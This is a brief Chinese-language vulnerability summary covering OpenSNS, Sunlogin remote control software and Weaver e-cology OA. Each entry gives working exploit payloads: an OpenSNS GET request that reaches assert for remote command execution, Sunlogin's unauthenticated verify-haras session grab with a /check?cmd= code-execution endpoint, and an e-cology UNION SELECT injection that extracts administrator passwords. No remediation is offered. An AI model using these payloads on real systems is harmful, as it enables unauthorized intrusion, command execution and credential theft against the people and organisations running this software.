OpenSNS开源社交建站系统,包含微博、资讯、论坛、群组、问答、微店等模块,可适应行业多元化,领先级SNS社交app软件开发公司。OpenSNS 存在远程命令执行漏洞，攻击者通过GET请求关键Payyload:`/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=`可以执行任意命令。

向日葵是一款免费的，集远程控制电脑手机、远程桌面连接、远程开机、远程管理、支持内网穿透的一体化远程控制管理工具软件。向日葵远程控制软件存在未授权访问漏洞，启动服务端软件后，会开放未授权访问端口，攻击者可通过未授权访问使用关键payload:/cgi-bin/rpc?action=verify-haras(1、端口扫描后;2、找到向日葵客户端pid，根据pid查找开放端口）无需密码直接获取session，并使用关键payload:/check?cmd=远程执行任意代码。

泛微e-cology是专为大中型企业制作的OA办公系统,支持PC端、移动端和微信端同时办公等。 泛微e-cology存在SQL注入漏洞。攻击者可在GET请求参数id中写入常用payload:1%20UNION%20SELECT%20password%20as%20id%20from%20HrmResourceManager。